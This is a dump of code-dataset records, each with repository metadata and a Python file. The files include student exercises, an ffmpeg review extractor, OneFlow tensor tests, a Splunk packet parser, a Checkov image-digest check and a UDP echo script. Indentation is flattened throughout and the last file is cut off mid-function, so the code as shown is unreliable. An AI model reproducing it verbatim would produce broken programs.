a771a00c3fd049c6dc8482812b8ea1fb06246838 | 1c72aa6d53c886d8fb8ae41a3e9b9c6c4dd9dc6f | /Semester 1/Project submissions/Lewis Clarke/Lewis_Clarke_Python_Coding-2016-04-18/Python Coding/Week 6/position_in_alphabet.py | be2781345f12dca69e6c90d6d0f722351786bf62 | [] | no_license | codebubb/python_course | 74761ce3189d67e3aff964c056aeab27d4e94d4a | 4a6ed4a64e6a726d886add8364c65956d5053fc2 | refs/heads/master | 2021-01-11T03:06:50.519208 | 2016-07-29T10:47:12 | 2016-10-17T10:42:29 | 71,114,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | key = 'abcdefghijklmnopqrstuvwxyz'
def alpha():
word = raw_input('Enter a letter to find its numerical value: ')
if word not in key:
word = raw_input('You did not enter a letter.\nEnter a letter to find its numerical value: ')
for i in word:
n = 1
x = (key.index(i) + n)
print x
alpha()
| [
"[email protected]"
] | |
08366dcc624471b8269aabe510ee9f4625242ad9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03012/s966640357.py | f6c0b5afb072f834dc2ec2f8bf626c997ed95245 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | N = int(input())
W = input().split()
W = [int(w) for w in W]
S = sum(W)
mini = pow(10, 10)
for i in range(N):
mi = abs(S - 2 * sum(W[0:i]))
if mi < mini:
mini = mi
print(mini) | [
"[email protected]"
] | |
65ad7779c0771342e26563f4829f19544fe0d22a | b27dba9265e3fc46453293af33e215784cc60d15 | /pype/plugins/standalonepublisher/publish/extract_review.py | fbc14785a4091115ef61a811360275e740e545fd | [
"MIT"
] | permissive | tws0002/pype | f8f655f51282128b7ac42df77fca58957f416dcd | 80b1aad9990f6c7efabf0430a3da6633054bf4a8 | refs/heads/develop | 2020-04-29T21:51:22.583645 | 2019-12-09T04:23:17 | 2019-12-09T04:23:17 | 176,426,875 | 0 | 0 | MIT | 2019-12-09T04:23:18 | 2019-03-19T04:56:38 | Python | UTF-8 | Python | false | false | 7,630 | py | import os
import tempfile
import pyblish.api
from pype.vendor import clique
import pype.api
class ExtractReviewSP(pyblish.api.InstancePlugin):
"""Extracting Review mov file for Ftrack
Compulsory attribute of representation is tags list with "review",
otherwise the representation is ignored.
All new represetnations are created and encoded by ffmpeg following
presets found in `pype-config/presets/plugins/global/publish.json:ExtractReview:outputs`. To change the file extension
filter values use preset's attributes `ext_filter`
"""
label = "Extract Review SP"
order = pyblish.api.ExtractorOrder + 0.02
families = ["review"]
hosts = ["standalonepublisher"]
def process(self, instance):
# adding plugin attributes from presets
presets = instance.context.data["presets"]
try:
publish_presets = presets["plugins"]["standalonepublisher"]["publish"]
plugin_attrs = publish_presets[self.__class__.__name__]
except KeyError:
raise KeyError("Preset for plugin \"{}\" are not set".format(
self.__class__.__name__
))
output_profiles = plugin_attrs.get("outputs", {})
fps = instance.data.get("fps")
start_frame = instance.data.get("frameStart")
self.log.debug("Families In: `{}`".format(instance.data["families"]))
# get specific profile if was defined
specific_profiles = instance.data.get("repreProfiles")
new_repres = []
# filter out mov and img sequences
for repre in instance.data["representations"]:
tags = repre.get("tags", [])
if "review" not in tags:
continue
staging_dir = repre["stagingDir"]
for name in specific_profiles:
profile = output_profiles.get(name)
if not profile:
self.log.warning(
"Profile \"{}\" was not found in presets".format(name)
)
continue
self.log.debug("Processing profile: {}".format(name))
ext = profile.get("ext", None)
if not ext:
ext = "mov"
self.log.debug((
"`ext` attribute not in output profile \"{}\"."
" Setting to default ext: `mov`"
).format(name))
if isinstance(repre["files"], list):
collections, remainder = clique.assemble(repre["files"])
full_input_path = os.path.join(
staging_dir,
collections[0].format("{head}{padding}{tail}")
)
filename = collections[0].format('{head}')
if filename.endswith("."):
filename = filename[:-1]
else:
full_input_path = os.path.join(staging_dir, repre["files"])
filename = repre["files"].split(".")[0]
# prepare output file
repr_file = filename + "_{0}.{1}".format(name, ext)
out_stagigng_dir = tempfile.mkdtemp(prefix="extract_review_")
full_output_path = os.path.join(out_stagigng_dir, repr_file)
self.log.info("input {}".format(full_input_path))
self.log.info("output {}".format(full_output_path))
repre_new = repre.copy()
new_tags = [x for x in tags if x != "delete"]
p_tags = profile.get("tags", [])
self.log.info("p_tags: `{}`".format(p_tags))
for _tag in p_tags:
if _tag not in new_tags:
new_tags.append(_tag)
self.log.info("new_tags: `{}`".format(new_tags))
input_args = []
# overrides output file
input_args.append("-y")
# preset's input data
input_args.extend(profile.get("input", []))
# necessary input data
# adds start arg only if image sequence
if isinstance(repre["files"], list):
input_args.extend([
"-start_number {}".format(start_frame),
"-framerate {}".format(fps)
])
input_args.append("-i {}".format(full_input_path))
output_args = []
# preset's output data
output_args.extend(profile.get("output", []))
if isinstance(repre["files"], list):
# set length of video by len of inserted files
video_len = len(repre["files"])
else:
video_len = repre["frameEnd"] - repre["frameStart"] + 1
output_args.append(
"-frames {}".format(video_len)
)
# letter_box
lb_string = (
"-filter:v "
"drawbox=0:0:iw:round((ih-(iw*(1/{0})))/2):t=fill:c=black,"
"drawbox=0:ih-round((ih-(iw*(1/{0})))/2):iw:"
"round((ih-(iw*(1/{0})))/2):t=fill:c=black"
)
letter_box = profile.get("letter_box", None)
if letter_box:
output_args.append(lb_string.format(letter_box))
# output filename
output_args.append(full_output_path)
ffmpeg_path = os.getenv("FFMPEG_PATH", "")
if ffmpeg_path:
ffmpeg_path += "/ffmpeg"
else:
ffmpeg_path = "ffmpeg"
mov_args = [
ffmpeg_path,
" ".join(input_args),
" ".join(output_args)
]
subprcs_cmd = " ".join(mov_args)
# run subprocess
self.log.debug("Executing: {}".format(subprcs_cmd))
output = pype.api.subprocess(subprcs_cmd)
self.log.debug("Output: {}".format(output))
# create representation data
repre_new.update({
"name": name,
"ext": ext,
"files": repr_file,
"stagingDir": out_stagigng_dir,
"tags": new_tags,
"outputName": name,
"startFrameReview": 1,
"endFrameReview": video_len
})
# cleanup thumbnail from new repre
if repre_new.get("thumbnail"):
repre_new.pop("thumbnail")
if "thumbnail" in repre_new["tags"]:
repre_new["tags"].remove("thumbnail")
# adding representation
self.log.debug("Adding: {}".format(repre_new))
# cleanup repre from preview
if "preview" in repre:
repre.pop("preview")
if "preview" in repre["tags"]:
repre["tags"].remove("preview")
new_repres.append(repre_new)
for repre in instance.data["representations"]:
if "delete" in repre.get("tags", []):
instance.data["representations"].remove(repre)
for repre in new_repres:
self.log.debug("Adding repre: \"{}\"".format(
repre
))
instance.data["representations"].append(repre)
| [
"[email protected]"
] | |
819ff6ab0594922528da4d79e8be19d32e18fad2 | 73a0f661f1423d63e86489d4b2673f0103698aab | /python/oneflow/test/modules/test_contiguous.py | 4d589b551f159a895bb5b71bb58e4fb4ae3bb792 | [
"Apache-2.0"
] | permissive | Oneflow-Inc/oneflow | 4fc3e081e45db0242a465c4330d8bcc8b21ee924 | 0aab78ea24d4b1c784c30c57d33ec69fe5605e4a | refs/heads/master | 2023-08-25T16:58:30.576596 | 2023-08-22T14:15:46 | 2023-08-22T14:15:46 | 81,634,683 | 5,495 | 786 | Apache-2.0 | 2023-09-14T09:44:31 | 2017-02-11T06:09:53 | C++ | UTF-8 | Python | false | false | 4,922 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
from random import shuffle
import numpy as np
from oneflow.test_utils.automated_test_util import *
from oneflow.test_utils.test_util import GenArgList
import oneflow.unittest
import oneflow as flow
@flow.unittest.skip_unless_1n1d()
class TestContiguous(flow.unittest.TestCase):
@autotest(n=5)
def test_transpose_with_random_data(test_case):
device = random_device()
x = random_tensor(ndim=4).to(device)
y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
z = y.contiguous()
return z
@autotest(n=5, auto_backward=False)
def test_transpose_with_bool_data(test_case):
device = random_device()
x = random_tensor(ndim=4, requires_grad=False).to(device).to(torch.bool)
y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
z = y.contiguous()
return z
@autotest(n=5, auto_backward=False)
def test_transpose_with_int_data(test_case):
device = random_device()
x = random_tensor(ndim=4, requires_grad=False).to(device).to(torch.int)
y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
z = y.contiguous()
return z
@autotest(n=5, auto_backward=False)
def test_contiguous_with_half_data(test_case):
device = random_device()
x = random_tensor(ndim=4, requires_grad=False).to(device).to(torch.float16)
y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
z = y.contiguous()
return z
@autotest(n=10, check_graph=True)
def test_permute2d_tensor_with_random_data(test_case):
device = random_device()
ndim = 2
permute_list = [0, 1]
shuffle(permute_list)
x = random_tensor(
ndim=ndim, dim0=random(1, 32).to(int), dim1=random(1, 59).to(int),
).to(device)
y = x.permute(permute_list)
z = y.contiguous()
return z
@autotest(n=10, check_graph=True)
def test_permute3d_tensor_with_random_data(test_case):
device = random_device()
ndim = 3
permute_list = [0, 1, 2]
shuffle(permute_list)
x = random_tensor(
ndim=ndim,
dim0=random(1, 7).to(int),
dim1=random(1, 15).to(int),
dim2=random(1, 9).to(int),
).to(device)
y = x.permute(permute_list)
z = y.contiguous()
return z
@autotest(n=10, check_graph=True)
def test_permute4d_tensor_with_random_data(test_case):
device = random_device()
ndim = 4
permute_list = [0, 1, 2, 3]
shuffle(permute_list)
x = random_tensor(
ndim=ndim,
dim0=random(1, 7).to(int),
dim1=random(1, 15).to(int),
dim2=random(1, 9).to(int),
dim3=random(1, 19).to(int),
).to(device)
y = x.permute(permute_list)
z = y.contiguous()
return z
@profile(torch.Tensor.contiguous)
def profile_contiguous(test_case):
x = torch.ones(32, 3, 128, 128)
x.contiguous()
def _test_inplace_contiguous(test_case, device):
arr = np.random.randn(4, 5, 6, 7).astype(np.float32)
input = flow.tensor(arr, device=device)
x = input.permute(0, 3, 2, 1) # x is non-contiguous tensor
test_case.assertTrue(x.is_contiguous() == False)
# y1 is normal version of tensor contiguous
y1 = x.contiguous()
# y2 is inplace version of tensor contiguous
y2 = x.contiguous_()
test_case.assertTrue(np.array_equal(y1.cpu().numpy(), y2.cpu().numpy()))
test_case.assertTrue(id(x) != id(y1))
test_case.assertTrue(id(x) == id(y2))
test_case.assertTrue(x.is_contiguous() == True)
test_case.assertTrue(y1.is_contiguous() == True)
test_case.assertTrue(y2.is_contiguous() == True)
@flow.unittest.skip_unless_1n1d()
class TestInplaceContiguous(flow.unittest.TestCase):
def test_inplace_contiguous(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_inplace_contiguous,
]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
acf80746855eaad75fcbdc580daa49d5bee0bf95 | 20176bf4fbd8aec139c7b5a27f2c2e155e173e6e | /data/all-pratic/oinam_singh/myprogram/filewordcnt2.py | 993801d7b654e4f8041739bbfb5d975e82b48048 | [] | no_license | githubjyotiranjan/pytraining | 4ac4a1f83cc4270e2939d9d32c705019c5bc61c5 | 8b50c4ab7848bd4cbfdfbc06489768d577289c66 | refs/heads/master | 2020-03-19T06:22:20.793296 | 2018-06-15T20:08:11 | 2018-06-15T20:08:11 | 136,013,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | import operator
from collections import OrderedDict
from collections import defaultdict
mydict = defaultdict(int)
with open('tmpread.txt') as file:
for line in file:
line = line.strip()
for w in line.split():
mydict[w] += 1
#sorted_x = sorted(dics.items(), key=operator.itemgetter(1))
print(mydict.items());
print(mydict.keys());
d_sorted_by_value = OrderedDict(sorted(mydict.items(), key=lambda x: x[1]))
print(d_sorted_by_value.items());
print(d_sorted_by_value.keys());
d_sorted_by_key = OrderedDict(sorted(mydict.items(), key=lambda x: x[0]))
print(d_sorted_by_key.items());
print(d_sorted_by_key.keys());
| [
"[email protected]"
] | |
74f3ef6c3e844f6f8fa1234a783e57b16eddff82 | 8b57c6609e4bf3e6f5e730b7a4a996ad6b7023f0 | /persistconn/packet.py | 79a3d92edb26b212d7c04844f89ece59d3e93669 | [] | no_license | bullll/splunk | 862d9595ad28adf0e12afa92a18e2c96308b19fe | 7cf8a158bc8e1cecef374dad9165d44ccb00c6e0 | refs/heads/master | 2022-04-20T11:48:50.573979 | 2020-04-23T18:12:58 | 2020-04-23T18:12:58 | 258,293,313 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,103 | py | from builtins import range
from builtins import object
import sys, os
import json
import splunk.util
class PersistentServerConnectionProtocolException(Exception):
"""
Exception thrown when a recieved packet can't be interpreted
"""
pass
class PersistentServerConnectionRequestPacket(object):
"""
Object representing a recieved packet
"""
def __init__(self):
self.opcode = None
self.command = None
self.command_arg = None
self.block = None
def is_first(self):
"""
@rtype: bool
@return: True if this packet represents the beginning of the request
"""
return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_INIT) != 0
def is_last(self):
"""
@rtype: bool
@return: True if this packet represents the end of the request
"""
return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_END) != 0
def has_block(self):
"""
@rtype: bool
@return: True if this packet contains an input block for the request
"""
return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_BLOCK) != 0
def allow_stream(self):
"""
For future use.
"""
return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_ALLOW_STREAM) != 0
def __str__(self):
s = "is_first=%c is_last=%c allow_stream=%c" % (
"NY"[self.is_first()],
"NY"[self.is_last()],
"NY"[self.allow_stream()])
if self.command is not None:
s += " command=%s" % json.dumps(self.command)
if self.command_arg is not None:
s += " command_arg=%s" % json.dumps(self.command_arg)
if self.has_block():
s += " block_len=%u block=%s" % (
len(self.block),
json.dumps(str(self.block)))
return s
OPCODE_REQUEST_INIT = 0x01
OPCODE_REQUEST_BLOCK = 0x02
OPCODE_REQUEST_END = 0x04
OPCODE_REQUEST_ALLOW_STREAM = 0x08
def read(self, handle):
"""
Read a length-prefixed protocol data from a file handle, filling this object
@param handle: File handle to read from
@rtype: bool
@return: False if we're at EOF
"""
while True:
opbyte = handle.read(1)
if opbyte == b"":
return False
if opbyte != b"\n":
break # ignore extra newlines before opcode
self.opcode = ord(opbyte)
if self.is_first():
command_pieces = PersistentServerConnectionRequestPacket._read_number(handle)
self.command = []
for i in range(0, command_pieces):
piece = PersistentServerConnectionRequestPacket._read_string(handle)
if sys.version_info >= (3, 0):
piece = piece.decode()
self.command.append(piece)
self.command_arg = PersistentServerConnectionRequestPacket._read_string(handle)
if self.command_arg == b"":
self.command_arg = None
elif sys.version_info >= (3, 0):
self.command_arg = self.command_arg.decode()
if self.has_block():
self.block = PersistentServerConnectionRequestPacket._read_string(handle)
return True
@staticmethod
def _read_to_eol(handle):
v = b""
while True:
e = handle.read(1)
if not e:
if v == b"":
raise EOFError
break
if e == b'\n':
break
v += e
return v
@staticmethod
def _read_number(handle):
while True:
v = PersistentServerConnectionRequestPacket._read_to_eol(handle)
if v != b"": # ignore empty lines before a count
break
try:
n = int(v)
except ValueError:
raise PersistentServerConnectionProtocolException("expected non-negative integer, got \"%s\"" % v)
if n < 0:
raise PersistentServerConnectionProtocolException("expected non-negative integer, got \"%d\"" % n)
return n
@staticmethod
def _read_string(handle):
return handle.read(PersistentServerConnectionRequestPacket._read_number(handle))
class PersistentServerConnectionPacketParser(object):
"""
Virtual class which handles packet-level I/O with stdin/stdout. The
handle_packet method must be overridden.
"""
def __init__(self):
self._owed_flush = False
def write(self, data):
"""
Write out a string, preceded by its length. If a dict is passed
in, it is automatically JSON encoded
@param data: String or dictionary to send.
"""
if sys.version_info >= (3, 0):
if isinstance(data, bytes):
sys.stdout.buffer.write(("%u\n" % len(data)).encode("ascii"))
sys.stdout.buffer.write(data)
elif isinstance(data, str):
edata = data.encode("utf-8")
sys.stdout.buffer.write(("%u\n" % len(edata)).encode("ascii"))
sys.stdout.buffer.write(edata)
elif isinstance(data, dict):
edata = json.dumps(data, separators=(',', ':')).encode("utf-8")
sys.stdout.buffer.write(("%u\n" % len(edata)).encode("ascii"))
sys.stdout.buffer.write(edata)
else:
raise TypeError("Don't know how to serialize %s" % type(data).__name__)
else:
if isinstance(data, splunk.util.string_type):
sys.stdout.write("%u\n%s" % (len(data), data))
elif isinstance(data, dict):
s = json.dumps(data, separators=(',', ':'))
sys.stdout.write("%u\n%s" % (len(s), s))
else:
raise TypeError("Don't know how to serialize %s" % type(data).__name__)
self._owed_flush = True
def run(self):
"""
Continuously read packets from stdin, passing each one to handle_packet()
"""
if os.name.startswith("nt"):
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
while True:
in_packet = PersistentServerConnectionRequestPacket()
handle = sys.stdin
if sys.version_info >= (3, 0):
handle = sys.stdin.buffer
if not in_packet.read(handle):
break
self.handle_packet(in_packet)
if self._owed_flush:
sys.stdout.flush()
self._owed_flush = False
def handle_packet(self, in_packet):
"""
Virtual method called for each recieved packet
@param in_packet: PersistentServerConnectionRequestPacket object recieved
"""
raise NotImplementedError("PersistentServerConnectionPacketParser.handle_packet")
| [
"[email protected]"
] | |
828624b6a0bd565af050bba8f33e9056adbcecb7 | 7ac271f357f4c8f0c23c697b11966259f836880f | /app/web/api/dvdrental/actors/views.py | c01616606759e970c7df14c53e3b08550a941cdf | [] | no_license | cheng93/PythonWeb | 74a58eadee4ee7d2872a582a907bbf47630df371 | d5ced8dee1d5ba31778125c5e67169c92acf26a0 | refs/heads/develop | 2021-01-19T23:59:11.315871 | 2018-03-04T19:26:18 | 2018-03-04T19:26:18 | 89,063,916 | 0 | 0 | null | 2018-03-04T19:26:19 | 2017-04-22T11:09:14 | Python | UTF-8 | Python | false | false | 865 | py | from pyramid.view import view_defaults, view_config
@view_defaults(renderer='json', request_method='GET')
class ActorsView:
def __init__(self, request):
self.request = request
@view_config(route_name='get_actors')
def get_actors(self):
actors = self.request.actor_command.get_actors()
actors = [a.__dict__ for a in actors]
return actors
@view_config(route_name='get_actor')
def get_actor(self):
actor_id = self.request.matchdict['actor_id']
actor = self.request.actor_command.get_actor(actor_id)
return actor.__dict__
@view_config(route_name='get_actor_films')
def get_actor_films(self):
actor_id = self.request.matchdict['actor_id']
films = self.request.actor_command.get_actor_films(actor_id)
films = [f.__dict__ for f in films]
return films
| [
"[email protected]"
] | |
dc07e10ef638298141ad655475063b1d466b7bd6 | adbf09a31415e6cf692ff349bd908ea25ded42a8 | /challenges/custm_error.py | 6588a2c0db988b4e09b75f6b79a1402a21026bb8 | [] | no_license | cmulliss/gui_python | 53a569f301cc82b58880c3c0b2b415fad1ecc3f8 | 6c83d8c2e834464b99024ffd8cf46ac4e734e7a4 | refs/heads/main | 2023-08-12T22:33:01.596005 | 2021-10-11T12:35:41 | 2021-10-11T12:35:41 | 408,176,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | class TooManyPagesReadError(ValueError):
pass
class Book:
def __init__(self, name: str, page_count: int):
self.name = name
self.page_count = page_count
self.pages_read = 0
def __repr__(self):
return (
f"<Book {self.name}, read {self.pages_read} pages out of {self.page_count}>"
)
def read(self, pages: int):
if self.pages_read + pages > self.page_count:
raise TooManyPagesReadError(
f"You tried to read {self.pages_read + pages} pages, but this book only has {self.page_count} pages."
)
self.pages_read += pages
print(f"You have now read {self.pages_read} pages out of {self.page_count}")
python101 = Book("Python 101", 50)
try:
python101.read(35)
python101.read(50)
except TooManyPagesReadError as e:
print(e)
# This now raises an error, which has a helpful name and a helpful error message.
| [
"[email protected]"
] | |
0231d5a6b9754525fcc80fa184b2442b8c4d82d2 | b449980703b2234e5610d20d22d54cb811722b68 | /netdisco/discoverables/nanoleaf_aurora.py | 135d785a425446491b59ae18c63cdcf06bf42dd8 | [
"Apache-2.0"
] | permissive | bdraco/netdisco | 81209c0ad21b2ca124b91fa67799034c337d62a8 | cf547a8bac673f5aa92cde98824929fc9a31f05b | refs/heads/master | 2023-06-17T09:40:18.001345 | 2020-06-17T21:23:05 | 2020-06-17T21:23:05 | 275,917,535 | 0 | 0 | NOASSERTION | 2020-06-29T20:20:12 | 2020-06-29T20:20:12 | null | UTF-8 | Python | false | false | 278 | py | """Discover Nanoleaf Aurora devices."""
from . import MDNSDiscoverable
class Discoverable(MDNSDiscoverable):
"""Add support for discovering Nanoleaf Aurora devices."""
def __init__(self, nd):
super(Discoverable, self).__init__(nd, '_nanoleafapi._tcp.local.')
| [
"[email protected]"
] | |
25164cbffde1974a5c531b3dfc519310cb45c313 | 334d0a4652c44d0c313e11b6dcf8fb89829c6dbe | /checkov/terraform/checks/resource/kubernetes/ImageDigest.py | 92de4c65bc61d761b0e9ee2ee9f999bd465db7c8 | [
"Apache-2.0"
] | permissive | schosterbarak/checkov | 4131e03b88ae91d82b2fa211f17e370a6f881157 | ea6d697de4de2083c8f6a7aa9ceceffd6b621b58 | refs/heads/master | 2022-05-22T18:12:40.994315 | 2022-04-28T07:44:05 | 2022-04-28T07:59:17 | 233,451,426 | 0 | 0 | Apache-2.0 | 2020-03-23T12:12:23 | 2020-01-12T20:07:15 | Python | UTF-8 | Python | false | false | 1,563 | py |
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
class ImageDigest(BaseResourceCheck):
def __init__(self):
"""
The image specification should use a digest instead of a tag to make sure the container always uses the same
version of the image.
https://kubernetes.io/docs/concepts/configuration/overview/#container-images
An admission controller could be used to enforce the use of image digest
"""
name = "Image should use digest"
id = "CKV_K8S_43"
supported_resources = ["kubernetes_pod"]
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def scan_resource_conf(self, conf) -> CheckResult:
spec = conf.get('spec')[0]
if spec:
containers = spec.get("container")
for idx, container in enumerate(containers):
if not isinstance(container, dict):
return CheckResult.UNKNOWN
if container.get("image") and isinstance(container.get("image"), list):
name = container.get("image")[0]
if "@" not in name:
self.evaluated_keys = [f'spec/[0]/container/[{idx}]/image']
return CheckResult.FAILED
return CheckResult.PASSED
return CheckResult.FAILED
check = ImageDigest()
| [
"[email protected]"
] | |
4485c5cf11f59565b40a8d538af812f0554de596 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03089/s906755257.py | 498b64bddcd6ad6dac9dc95de7a88f6376c3de4f | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | N = int(input())
B = list(map(int, input().split()))
ans = []
for i in range(N):
last = 0
for j, b in enumerate(B, 1):
if b == j:
last = b
if last == 0:
print(-1)
exit()
else:
ans.append(B.pop(last - 1))
[print(a) for a in ans[::-1]] | [
"[email protected]"
] | |
df774daf61ba15eb90766bfcf097cd921934fd35 | bdcf56bc8fdf4255b34038bf0280f21917f185a7 | /005_landmarks_retrieval/test_data_generator.py | e8957bda42baa14c938c1e8339c6d7db082c7560 | [] | no_license | Apollo1840/United_Kagglers | 8dc05287f893a33f774efeaf0cd2ad436122dc69 | 80147867a6011da5a36e78473781481c805619ea | refs/heads/master | 2020-04-10T18:51:29.223449 | 2019-04-13T08:32:25 | 2019-04-13T08:32:25 | 161,214,800 | 1 | 0 | null | 2019-04-06T09:16:40 | 2018-12-10T17:53:31 | Python | UTF-8 | Python | false | false | 474 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 6 08:30:38 2019
@author: zouco
"""
from data_generator import triplet_generation
from data_generator import DataGenerator
tg = triplet_generation()
ID = "00cfd9bbf55a241e"
img3 = tg.get_one_input_tensor(ID)
print(len(img3))
print(img3[0].shape)
from tools.plot_image import plot_imgs
plot_imgs(img3)
dg = DataGenerator("test", None)
X, y = dg.__getitem__(1)
# print(X)
print(len(X))
print(X[0].shape)
print(y.shape)
| [
"[email protected]"
] | |
0b8635d05f232b3683ce31ae12276f9c46ef05a3 | 35b58dedc97622b1973456d907ede6ab86c0d966 | /day022/day22.py | 8f8b5cb73e108c01ced7d4dee535666b5e32f737 | [] | no_license | GithubLucasSong/PythonProject | 7bb2bcc8af2de725b2ed9cc5bfedfd64a9a56635 | e3602b4cb8af9391c6dbeaebb845829ffb7ab15f | refs/heads/master | 2022-11-23T05:32:44.622532 | 2020-07-24T08:27:12 | 2020-07-24T08:27:12 | 282,165,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | # from socket import *
# s = socket(AF_INET,SOCK_DGRAM) #创建套接字
# addr = ('192.168.14.25',8080) #准备接收方地址
# data = input('请输入:')
# s.sendto(data.encode(),addr)
# #发送数据时,python3需要将字符串装换成byte
# #encode('utf-8') 用utf-8对数据进行编码,获得bytes类型对象
# #decode()反过来
# s.close()
# from socket import *
# import time
#
# s = socket(AF_INET,SOCK_DGRAM) #创建套接字
# s.bind(('', 8788))
# addr = ('192.168.14.25',8788) #准备接收方地址
# data = input('亲输入:')
# s.sendto(data.encode(),addr)
# time.sleep(1)
# #等待接收数据
# data = s.recvfrom(1024)
# # 1024表示本次接收的最大的字节数
# print(data)
from socket import *
#创建套接字
udpSocket = socket(AF_INET,SOCK_DGRAM)
#绑定本地信息,不使用随机分配的端口
binAddr = ('',7088)
udpSocket.bind(binAddr)
num = 0
while True:
#接收对方发送的数据
recvData = udpSocket.recvfrom(1024)
print(recvData)
#将接收到的数据发回给对方
udpSocket.sendto(recvData[0],recvData[1])
num += 1
print('已将接收到的第%d个数据返回给对方,'%num)
udpSocket.close() | [
"[email protected]"
] | |
1eb767cf72d777c0f346fc7cee95917651a364a3 | b736c527824198e1b07c821b685ca679cede79dd | /classes/FileSystemTools.py | 6485992423ec7a372ece0d2d6edc96202280c550 | [] | no_license | LaoKpa/neat-3 | c276b58ce2dd77ea32b701820adc29b99f508ec7 | b2b89023db5822d498b3edc84f8b84880dc6e6b6 | refs/heads/master | 2022-03-19T08:57:40.857925 | 2019-11-16T05:29:17 | 2019-11-16T05:29:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,461 | py | from datetime import datetime
from os import mkdir
import os
from copy import copy,deepcopy
import time
import glob
import subprocess
def getDateString():
return(datetime.now().strftime('%d-%m-%Y_%H-%M-%S'))
def makeDir(dir_name):
# Even if this is in a library dir, it should make the dir
# in the script that called it.
mkdir(dir_name)
return(dir_name)
def makeDateDir(base_dir='.'):
# Just creates a dir with the current date for its name
ds = getDateString()
full_dir = combineDirAndFile(base_dir, ds)
makeDir(full_dir)
return(full_dir)
def makeLabelDateDir(label, base_dir='.'):
# You give it a label, and it creates the dir label_datestring
dir_name = label + '_' + getDateString()
full_dir = combineDirAndFile(base_dir, dir_name)
makeDir(full_dir)
return(full_dir)
def combineDirAndFile(dir, file):
# Adds the file to the end of dir, adding a slash in between if needed.
return(addTrailingSlashIfNeeded(dir) + file)
def dictPrettyPrint(in_dict):
# Formats a dict into a nice string with each k,v entry on a new line,
# and prints it.
dict_str = '{\n'
for k,v in in_dict.items():
dict_str += '\t{} : {}\n'.format(k, v)
dict_str += '\n}\n'
print(dict_str)
def dictToStringList(dict):
pd_copy = copy(dict)
for k,v in pd_copy.items():
if type(v).__name__ == 'float':
if abs(v)>10**-4:
pd_copy[k] = '{:.5f}'.format(v)
else:
pd_copy[k] = '{:.2E}'.format(v)
params = [str(k)+'='+str(v) for k,v in pd_copy.items() if v is not None]
return(params)
def paramDictToFnameStr(param_dict):
# Creates a string that can be used as an fname, separated by
# underscores. If a param has the value None, it isn't included.
params = dictToStringList(param_dict)
return('_'.join(params))
def paramDictToLabelStr(param_dict):
# Creates a string that can be used as an fname, separated by
# ', '. If a param has the value None, it isn't included.
params = dictToStringList(param_dict)
return(', '.join(params))
def listToFname(list):
return('_'.join(list))
def parseSingleAndListParams(param_dict, exclude_list):
# This is useful for if you want to do multiple runs, varying one or
# several parameters at once. exclude_list are ones you don't want to
# include in the parameters in the tuple.
# It returns a list of the parameters that are varied,
# and a list of dictionaries that can be directly passed to a function, where
# each one has a different set of the varied params.
#
# You should pass the args where if you don't want to vary an arg, it's just normal
# my_arg = 5, but if you do want to vary it, you pass it a list of the vary values, like
# my_arg = [1, 5, 8]. If you want to vary two at the same time, you pass them both as separate
# lists, and it will match them up, but they need to be the same size.
# list_params is just a list of the params that were passed as a list, that we'll vary.
list_params = []
# single_params is a dict of the params that aren't varied and will have the same vals in each
# separate run.
single_params = {}
# ziplist is a list of the lists for the params that are varied. So if there are two varied
# args, each length 3, it will take these, and then below zip them to create a list of pairs.
# arg1=[1,2,3], arg2=[2,4,8] -> ziplist=[arg1,arg2] -> param_tups=[(1,2),(2,4),(3,8)]
ziplist = []
for k,v in param_dict.items():
if type(v).__name__ == 'list':
list_params.append(k)
ziplist.append(v)
